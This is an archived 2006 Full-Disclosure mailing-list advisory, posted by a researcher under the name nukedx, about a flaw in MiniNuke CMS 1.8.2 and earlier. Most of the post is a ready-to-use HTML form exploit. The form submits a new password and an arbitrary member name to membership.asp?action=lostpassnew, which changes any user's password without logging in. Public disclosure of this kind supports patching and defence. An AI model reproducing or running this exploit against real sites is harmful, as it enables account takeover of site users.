lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <20060112223643.e5oeda8tdk0k80gc@webmail.nukedx.com>
Date: Thu, 12 Jan 2006 22:36:43 -0600
From: nukedx@...edx.com
To: submit@...w0rm.com, full-disclosure@...ts.grok.org.uk,
	bugtraq@...urityfocus.com, orhankara@...lshosting.com
Subject: Advisory: MiniNuke CMS System <= 1.8.2
	(membership.asp) remote user password change exploit


--Security Report--
Advisory: MiniNuke CMS System <= 1.8.2 (membership.asp) remote user password
change exploit
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 12/01/06 08:49 PM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@...edx.com
Web: http://www.nukedx.com
}
---
Vendor: MiniNuke (www.miniex.net)
Version: 1.8.2 and prior versions must be affected.
About:Via this method remote attacker can change any users password without
login.
---
How&Example:
HTML Example
[code]
<html>
<title>MiniNuke <= 1.8.2 remote user password change</title>
<form method="POST" action="http://[SITE]/membership.asp?action=lostpassnew">
<table border="0" cellspacing="1" cellpadding="0" align="center" width="75%">
<tr><td colspan="2" align="center"><font face=verdana size=2>Now fill in the
blanks</font></td></tr>
<tr><td colspan="2" align="center"><font face=tahoma size=1red>Change password
</font></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD:
</font></td>
<td width="50%"><input type="text" name="pass" size="20"></td></tr>
<tr><td width="50%" align="right"><font face=verdana size=1>PASSWORD Again :
</font></td>
<td width="50%"><input type="text" name="passa" size="20"><input type="text"
name="x" value="Membername">&nbsp;&nbsp;
<input type="submit" value="Send" name="B1" style="font-family: Verdana;
font-size: 10px; border: 1px ridge #FFFFFF; background-color:
#FFFFFF"></td></tr>
</table></form>
</html>
[/code]
--
Regards,
 From the NWPX team,
nuker a.k.a nukedx



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ